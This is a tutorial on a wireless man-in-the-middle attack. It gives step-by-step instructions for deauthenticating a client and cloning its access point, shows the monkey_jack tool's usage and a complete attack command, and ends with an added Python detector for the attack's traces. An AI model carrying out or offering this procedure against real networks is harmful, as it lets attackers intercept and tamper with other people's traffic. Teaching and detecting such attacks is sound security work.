Wireless Hacking
A MITM attack that exploits 802.11 management frame vulnerabilities can be executed by the following steps:

1. You find a wireless idiot that's associated and communicating with an AP, then retrieve the idiot's RF channel and MAC address information.
2. You send a deauthenticate or disassociate frame to the idiot's system, forcing it to disconnect from the AP.
3. You then enable a fake AP posing as the original AP, using the same SSID and MAC address, with the only difference being that your system has to run on a different wireless channel, let's say channel 1 instead of channel 6.
4. The idiot's system automatically tries to reauthenticate and associate itself with the original AP, only this time the odds are good that it will connect to your system instead.
5. Your system then connects to the original AP so all client traffic is forwarded to the idiot's system, and the idiot's traffic is forwarded to your system.

The hacker has successfully inserted his system into the middle of the client-to-AP communications stream and achieved "man in the middle" status.

The monkey_jack utility can perform this type of wireless MITM attack. If you have the AirJack suite downloaded and compiled on a Linux-based system, the following can be used to run the program:

# ./monkey_jack -h
Monkey Jack: Wireless 802.11(b) MITM proof of concept.
Usage: ./monkey_jack -b -v -C [ -c ] [ -I ] [ -e ]
-a: number of disassociation frames to send (defaults to 7)
-t: number of deauthentication frames to send (defaults to 0)
-b: bssid, the mac address of the access point (e.g. 00:de:ad:be:ef:00)
-v: victim mac address.
-c: channel number (1-14) that the access point is on, defaults to current.
-C: channel number (1-14) that were going to move them to.
-i: the name of the AirJack interface to use (defaults to aj0).
-I: the name of the interface to use (defaults to eth1).
-e: the essid of the AP.

Now you know what is required... here's an example.

I'll use monkey_jack to insert our system (using interfaces aj0 and eth0) between the wireless client 00:09:5B:FF:FF:FF and the AP 00:40:96:FF:FF:FF with an SSID of lolz!. We'll also force it from wireless channel 6 to channel 1, and use the defaults for all other parameters. Note that, per the usage text above, -c is the channel the AP is currently on and -C is the channel the client is moved to:

# ./monkey_jack -b 00:40:96:FF:FF:FF -v 00:09:5b:FF:FF:FF -c 6 -C 1 -I eth0 -e "lolz!"

Well, so there you have it... assuming you received no errors during the execution of the command shown here, you're now officially the man in the middle. My next article will discuss ARP poisoning attacks! This article was written for those unfamiliar with wireless hacking. I believe you should only use this technique if you are pen-testing your wireless network and by no means should use this to test other systems without the express permission of the wireless owner.
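From the defender's side, the attack above leaves two observable signatures in monitor-mode captures: a burst of deauthentication/disassociation frames aimed at one client (step 2), followed by the AP's BSSID beaconing on a second channel (step 3). The detector below is an added example, not part of the original article or of the AirJack suite; the frame record layout, the thresholds and the sample frames are assumptions constructed for illustration.

```python
from collections import defaultdict

# Constructed frame records (not a real capture): (time_s, subtype, src, dst, channel),
# the fields a monitor-mode sniffer would log for 802.11 management frames.
AP = "00:40:96:FF:FF:FF"      # legitimate AP, beaconing on channel 6
CLIENT = "00:09:5B:FF:FF:FF"  # associated client
BCAST = "FF:FF:FF:FF:FF:FF"

FRAMES = [
    (0.0, "beacon", AP, BCAST, 6),
    (0.5, "beacon", AP, BCAST, 6),
    # seven disassociation frames to the client within 0.6 s (attack step 2)
    *[(1.0 + 0.1 * i, "disassoc", AP, CLIENT, 6) for i in range(7)],
    # the same BSSID now beaconing on channel 1 (attack step 3, cloned AP)
    (1.8, "beacon", AP, BCAST, 1),
    (2.0, "assoc_req", CLIENT, AP, 1),
]

def deauth_bursts(frames, threshold=5, window=2.0):
    """Alert when one (src, dst) pair carries `threshold` deauth/disassoc
    frames inside `window` seconds; a normal disconnect is a single frame."""
    history = defaultdict(list)
    alerts = []
    for t, subtype, src, dst, _ch in frames:
        if subtype not in ("deauth", "disassoc"):
            continue
        times = history[(src, dst)]
        times.append(t)
        while t - times[0] > window:      # drop frames outside the window
            times.pop(0)
        if len(times) == threshold:       # fire once, when the count reaches threshold
            alerts.append(("deauth_burst", src, dst))
    return alerts

def bssid_channel_conflicts(frames):
    """Alert when a single BSSID is seen beaconing on more than one channel,
    the footprint of a cloned AP that keeps the MAC but changes channel."""
    channels = defaultdict(set)
    for _t, subtype, src, _dst, ch in frames:
        if subtype == "beacon":
            channels[src].add(ch)
    return [("bssid_on_multiple_channels", bssid, tuple(sorted(chs)))
            for bssid, chs in channels.items() if len(chs) > 1]

def analyze(frames):
    """Run both checks over time-ordered frames and return the combined alerts."""
    frames = sorted(frames, key=lambda f: f[0])
    return deauth_bursts(frames) + bssid_channel_conflicts(frames)
```

On a real capture, feed the same tuples from a sniffer's management-frame log; the channel check alone will also flag legitimate multi-radio deployments that reuse a BSSID, so correlate it with the deauth burst before raising an incident.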